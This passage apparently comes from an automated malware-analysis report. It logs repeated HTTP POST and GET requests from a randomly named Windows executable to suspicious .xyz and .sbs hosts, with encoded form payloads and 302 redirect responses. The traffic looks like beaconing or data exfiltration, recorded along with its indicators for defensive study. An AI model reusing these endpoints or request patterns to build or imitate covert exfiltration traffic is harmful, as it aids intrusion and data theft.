                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.65878465.21.196.90802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:38.378262997 CEST790OUTPOST /zl45/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.030002837.xyz
                                                                                      Origin: http://www.030002837.xyz
                                                                                      Referer: http://www.030002837.xyz/zl45/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 71 2b 41 33 50 2b 4c 53 74 6e 53 54 74 51 65 51 48 4e 66 43 63 4b 6e 44 6a 4b 4c 31 79 4f 72 70 46 4b 79 39 75 79 69 73 37 57 35 4d 49 6d 7a 4d 50 6b 63 79 54 52 4c 30 6e 37 43 34 44 45 39 39 6a 67 6a 57 64 6c 4b 4e 50 41 49 64 68 49 75 2f 69 6d 71 53 33 2f 49 30 6a 53 61 2b 4f 32 61 33 68 7a 2b 4d 43 77 4f 78 4a 73 58 51 57 67 47 39 2f 2f 37 64 58 35 59 34 72 7a 30 51 6b 76 35 6d 49 54 63 77 35 77 57 62 32 79 67 44 62 75 73 64 34 4d 41 62 49 34 39 4b 57 54 52 48 73 37 6a 59 6c 33 36 78 43 41 55 4e 4f 41 55 30 4d 63 47 45 31 50 4e 68 78 44 36 42 79 59 62 38 41 46 6a 50 48 42 67 59 43 35 6b 2f 78 77 6b 32 6f 6c 52 45 55 6d 64 78 41 7a 57 72 39 57 64 51 58 68 79 7a 73 51 3d 3d
                                                                                      Data Ascii: 9jtPKX=q+A3P+LStnSTtQeQHNfCcKnDjKL1yOrpFKy9uyis7W5MImzMPkcyTRL0n7C4DE99jgjWdlKNPAIdhIu/imqS3/I0jSa+O2a3hz+MCwOxJsXQWgG9//7dX5Y4rz0Qkv5mITcw5wWb2ygDbusd4MAbI49KWTRHs7jYl36xCAUNOAU0McGE1PNhxD6ByYb8AFjPHBgYC5k/xwk2olREUmdxAzWr9WdQXhyzsQ==
                                                                                      Sep 30, 2024 10:42:39.054147959 CEST1038INHTTP/1.1 302 Found
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 771
                                                                                      date: Mon, 30 Sep 2024 08:42:38 GMT
                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                      location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi
                                                                                      vary: User-Agent
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.65878565.21.196.90802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:40.922142029 CEST1803OUTPOST /zl45/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.030002837.xyz
                                                                                      Origin: http://www.030002837.xyz
                                                                                      Referer: http://www.030002837.xyz/zl45/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 71 2b 41 33 50 2b 4c 53 74 6e 53 54 74 51 65 51 48 4e 66 43 63 4b 6e 44 6a 4b 4c 31 79 4f 72 70 46 4b 79 39 75 79 69 73 37 57 78 4d 49 7a 76 4d 4f 46 63 79 53 52 4c 30 75 62 43 35 44 45 39 73 6a 67 72 53 64 6c 47 7a 50 44 77 64 7a 36 4b 2f 31 6b 43 53 35 2f 49 30 38 43 61 2f 54 6d 62 31 68 7a 75 49 43 77 65 78 4a 73 58 51 57 6a 75 39 38 75 37 64 52 35 59 37 73 7a 30 55 67 76 35 43 49 58 77 47 35 30 4b 74 32 47 55 44 61 4f 38 64 36 2b 59 62 46 34 39 4d 59 7a 51 61 73 37 75 43 6c 30 66 43 43 45 63 6e 4f 43 49 30 4f 39 6a 67 70 4e 64 64 69 52 79 46 7a 34 72 49 46 31 54 35 41 54 78 6f 52 36 55 49 30 44 67 4f 7a 46 6c 7a 66 51 41 4b 4b 67 65 47 33 57 74 48 62 7a 32 37 32 75 72 4a 46 6f 68 64 57 30 75 55 6f 39 48 44 57 34 34 67 39 6c 45 65 4b 56 54 76 37 2b 6e 64 7a 57 35 35 78 50 75 46 73 46 69 6c 53 39 7a 4f 39 74 6c 4c 35 43 49 49 56 30 6e 44 75 65 35 66 6b 78 49 44 68 36 52 49 7a 4c 59 35 4c 44 34 72 31 64 66 30 6c 68 58 67 49 64 2f 44 68 37 67 6c 56 53 33 47 50 31 72 76 79 46 63 [TRUNCATED]
                                                                                      Data Ascii: 9jtPKX=q+A3P+LStnSTtQeQHNfCcKnDjKL1yOrpFKy9uyis7WxMIzvMOFcySRL0ubC5DE9sjgrSdlGzPDwdz6K/1kCS5/I08Ca/Tmb1hzuICwexJsXQWju98u7dR5Y7sz0Ugv5CIXwG50Kt2GUDaO8d6+YbF49MYzQas7uCl0fCCEcnOCI0O9jgpNddiRyFz4rIF1T5ATxoR6UI0DgOzFlzfQAKKgeG3WtHbz272urJFohdW0uUo9HDW44g9lEeKVTv7+ndzW55xPuFsFilS9zO9tlL5CIIV0nDue5fkxIDh6RIzLY5LD4r1df0lhXgId/Dh7glVS3GP1rvyFcEEFheIFgeo1wCNBaUxmZunoitBXJp5hs2pBfJiXqJ1RBQthSSWnPOkQpPf8C4H5VB4I62dUZFs4248ZuU+lM2eyW7uvEzsafY1agMhriWK2SA+7gnPXjBo5aVc63MseE0h2Pcl4hy3Ax9qfYe6eKYlUQeICZgfpqsYQdz9SHDcwheajbTuNRhLS07H9arZpuURaHzNE2CTMiAPgW6zxavcz/MSHM6H6e0BnVN8ZEWDreZuLUqNbIbRDWuI+40LUCip7Y4kJ/UDX+4VM+zVOi/DFjKL8eaLswJ7kZEVqnBye9O3SyN/c0/ViUE4+9MDXo47bRmEntYXG1zdsam/dBoOmdm8QtT/jtnIKPpD4lxInYPQ9tR2NGBMlHXQHY6hlLMvmUWUdnHfqrUb/IbpZz+OmdtQsA7LdUWWjZjW/c/JlRLJs1jlzim1KVD7YuiShn03kWbz35Cd4buqgXFba9CQiLoj375eicLgTzGA6Tr3fe+lho33zI/VW+nXLmEDEWjHGoRIu63Vx5s0hTt5I6geQOqsQ4Ght3K+benVfc4dngAPHg9iLbWZNgAQ68NV5ELonf7CAzoS65HtS/Ax7oaDP5lYvVhRXaMoCbwCYmNCDEk9nM1gftFCiZOmoaiPiwX5egL1amBHscxiE5c7RXEUXWVw2KDIbmif [TRUNCATED]
                                                                                      Sep 30, 2024 10:42:41.574207067 CEST1038INHTTP/1.1 302 Found
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 771
                                                                                      date: Mon, 30 Sep 2024 08:42:41 GMT
                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                      location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi
                                                                                      vary: User-Agent
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.65878665.21.196.90802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:43.577182055 CEST505OUTGET /zl45/?9jtPKX=n8oXMK/zoXm+9Sf+Cf+3HqD48reH4J6cLbqP6V+sjhkAIyrgNn1URxDPpIGDIxJivz/4HVO+PmZpgKq+kRyFpOwr2F+KRn2bmC2fKgazXZTeNyaA5M+5Xps7rgsZqfJ/BnEswgE=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.030002837.xyz
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:42:44.316797972 CEST1196INHTTP/1.1 302 Found
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 771
                                                                                      date: Mon, 30 Sep 2024 08:42:44 GMT
                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                      location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi?9jtPKX=n8oXMK/zoXm+9Sf+Cf+3HqD48reH4J6cLbqP6V+sjhkAIyrgNn1URxDPpIGDIxJivz/4HVO+PmZpgKq+kRyFpOwr2F+KRn2bmC2fKgazXZTeNyaA5M+5Xps7rgsZqfJ/BnEswgE=&YDT4P=4xd8DzO
                                                                                      vary: User-Agent
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.658787172.217.31.4802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:49.721344948 CEST769OUTPOST /6a3e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.x4wrqqc2tn.sbs
                                                                                      Origin: http://www.x4wrqqc2tn.sbs
                                                                                      Referer: http://www.x4wrqqc2tn.sbs/6a3e/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 4d 62 78 73 71 66 30 74 63 39 5a 5a 64 76 2b 2f 4e 78 62 63 30 62 6b 51 4a 49 43 42 45 32 2b 52 6d 32 41 64 47 46 4a 63 6a 74 30 44 42 52 78 68 48 52 43 41 38 73 59 31 33 79 49 42 4f 52 54 4e 67 4f 33 74 34 45 36 6b 65 6b 75 4f 2b 5a 32 45 33 71 63 46 6e 54 56 30 30 6b 45 67 30 79 56 4c 6b 37 65 38 7a 66 61 56 52 4f 78 66 7a 41 4c 59 6d 37 33 65 41 70 49 49 73 51 75 2b 2f 50 52 76 79 78 6e 72 79 52 4e 78 6e 74 63 55 4b 68 69 45 2f 74 46 4a 44 57 55 6c 75 6f 65 61 69 55 46 55 61 59 55 4b 48 78 42 74 79 70 4b 74 62 76 38 64 6a 37 66 30 30 75 34 63 63 42 4e 38 4f 57 78 74 2b 6e 54 4a 63 2b 69 44 6e 78 41 50
                                                                                      Data Ascii: 9jtPKX=Mbxsqf0tc9ZZdv+/Nxbc0bkQJICBE2+Rm2AdGFJcjt0DBRxhHRCA8sY13yIBORTNgO3t4E6kekuO+Z2E3qcFnTV00kEg0yVLk7e8zfaVROxfzALYm73eApIIsQu+/PRvyxnryRNxntcUKhiE/tFJDWUluoeaiUFUaYUKHxBtypKtbv8dj7f00u4ccBN8OWxt+nTJc+iDnxAP


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.658788172.217.31.4802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:52.460562944 CEST793OUTPOST /6a3e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.x4wrqqc2tn.sbs
                                                                                      Origin: http://www.x4wrqqc2tn.sbs
                                                                                      Referer: http://www.x4wrqqc2tn.sbs/6a3e/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 4d 62 78 73 71 66 30 74 63 39 5a 5a 63 4f 4f 2f 50 57 76 63 2f 62 6b 54 46 6f 43 42 4f 57 2b 56 6d 32 4d 64 47 48 6b 52 6a 66 41 44 43 7a 5a 68 45 51 43 41 76 63 59 31 38 53 49 45 4b 52 54 54 67 4f 72 66 34 47 2b 6b 65 6b 36 4f 2b 62 75 45 32 64 49 45 6d 44 56 36 73 55 45 69 71 43 56 4c 6b 37 65 38 7a 63 6d 2f 52 50 5a 66 7a 31 44 59 33 70 66 64 49 4a 49 50 72 51 75 2b 37 50 51 6d 79 78 6d 34 79 51 41 63 6e 75 6b 55 4b 6b 47 45 38 2f 39 47 55 6d 55 76 78 34 66 4c 72 47 4e 65 62 75 68 6c 47 6e 52 74 31 34 43 4b 54 35 39 48 2f 49 66 58 6d 2b 59 65 63 44 56 4f 4f 32 78 48 38 6e 72 4a 4f 70 75 6b 6f 46 6c 73 50 47 45 53 32 49 58 42 5a 59 35 43 61 46 59 48 58 4b 31 50 59 51 3d 3d
                                                                                      Data Ascii: 9jtPKX=Mbxsqf0tc9ZZcOO/PWvc/bkTFoCBOW+Vm2MdGHkRjfADCzZhEQCAvcY18SIEKRTTgOrf4G+kek6O+buE2dIEmDV6sUEiqCVLk7e8zcm/RPZfz1DY3pfdIJIPrQu+7PQmyxm4yQAcnukUKkGE8/9GUmUvx4fLrGNebuhlGnRt14CKT59H/IfXm+YecDVOO2xH8nrJOpukoFlsPGES2IXBZY5CaFYHXK1PYQ==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.658789172.217.31.4802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:55.052644014 CEST1806OUTPOST /6a3e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.x4wrqqc2tn.sbs
                                                                                      Origin: http://www.x4wrqqc2tn.sbs
                                                                                      Referer: http://www.x4wrqqc2tn.sbs/6a3e/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 4d 62 78 73 71 66 30 74 63 39 5a 5a 63 4f 4f 2f 50 57 76 63 2f 62 6b 54 46 6f 43 42 4f 57 2b 56 6d 32 4d 64 47 48 6b 52 6a 66 34 44 43 43 35 68 47 7a 36 41 73 63 59 31 78 79 49 46 4b 52 53 57 67 4f 6a 62 34 47 7a 52 65 6d 43 4f 78 59 6d 45 6a 59 6b 45 74 44 56 36 6c 30 45 6a 30 79 56 65 6b 2f 79 34 7a 63 32 2f 52 50 5a 66 7a 79 7a 59 33 37 33 64 4f 4a 49 49 73 51 75 71 2f 50 51 4b 79 31 4b 6f 79 51 46 68 6b 66 45 55 4b 45 57 45 77 71 70 47 57 47 55 70 77 34 66 54 72 47 51 45 62 75 56 54 47 6e 4d 49 31 36 65 4b 44 2b 41 4d 73 5a 76 4c 31 64 78 37 4c 68 49 31 57 7a 46 4c 2b 45 53 7a 43 71 4b 37 33 57 56 34 4c 32 31 46 77 65 57 56 51 50 78 59 52 52 74 73 53 70 30 4b 44 73 48 54 73 39 6c 35 46 6c 6c 52 49 6a 37 61 6d 48 6c 41 49 32 7a 71 6c 6a 6f 58 2b 57 5a 32 48 31 46 4d 4b 65 52 52 56 62 4a 6f 4c 49 5a 49 76 48 79 66 44 79 45 70 42 78 52 4b 52 73 30 6d 4c 5a 32 76 43 51 57 39 6f 46 43 2b 45 43 6a 78 34 6c 4a 5a 33 59 44 64 50 64 76 6f 48 36 4d 75 74 65 35 71 6d 4f 54 53 50 64 76 [TRUNCATED]
                                                                                      Data Ascii: 9jtPKX=Mbxsqf0tc9ZZcOO/PWvc/bkTFoCBOW+Vm2MdGHkRjf4DCC5hGz6AscY1xyIFKRSWgOjb4GzRemCOxYmEjYkEtDV6l0Ej0yVek/y4zc2/RPZfzyzY373dOJIIsQuq/PQKy1KoyQFhkfEUKEWEwqpGWGUpw4fTrGQEbuVTGnMI16eKD+AMsZvL1dx7LhI1WzFL+ESzCqK73WV4L21FweWVQPxYRRtsSp0KDsHTs9l5FllRIj7amHlAI2zqljoX+WZ2H1FMKeRRVbJoLIZIvHyfDyEpBxRKRs0mLZ2vCQW9oFC+ECjx4lJZ3YDdPdvoH6Mute5qmOTSPdv1IVZe7u/YLOgMtvy5vtJ3eEp7qUGiu7ybW3h0LQRsX6pglUdKxcw67FE5uEKjnRuoIs283yhKYZ0vgLgj9H+R6DMXWILMjwZ9FOFPabupoSDMRuiVePtSglN2xjG0YxbDLmSYMX3MM72mmOGD+65t4iOygFEwUzCBlU6a1c/6TeDvEELj7dx67ylIhpcZw6zTBUpB9Jdk9T36MWR3+et0EMw4/8TbIKyBMVxnJd6M+Dj7wEPCI4OnSsTSlOpeosPBSc26m1dhUv+3FeAXDrVWTeRbKHmEIcPV8inIzsZaqBLVURID25tG+RLf89y7XuLRXG0K5jFPsjQAFUw/KSgBdhpnR4jKYsboh6BMeKsov+drnsrPSpc7TJBIRCBtFKsmLzaz2/KMykOfBntrgxeBYp7xCvYEGADaWZbLl/FauH29RQzSa9PBEHl3+jNyFQadC24QZesRm0P5Dvto0JokNnu5i34FE91oZd1BWGrZk5Bp9j5j3NSa46e58R17N2XwYQppQPiEPzxu8TCkrfPzdMIqvhemBQq120BC8DG/nUTIGW0gtqVvBe8ZTexaxEpvkybReGlVG6vU1HZVOrOioJ27/4ZTwRUB5Sd+6RFOzcvgNpD4D90YC+/Ck16ARRSGm7tvCh4zgjFI6Jfts9SgACPRI9ePiv/uY [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.658790172.217.31.4802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:57.593101025 CEST506OUTGET /6a3e/?9jtPKX=BZZMppAtEsJZC+SCGnDJwYc0a7P3I2XUnV0yTl1cw/B5eiAAMyS7zeU40ykuIimpo83S7m3PRw3Wl4+UmttGxit0iCQT0nNXqtGO1eivbt9K3y3Fy6qkJMw6sxrg0uoowV+p4EU=&YDT4P=4xd8DzO HTTP/1.1
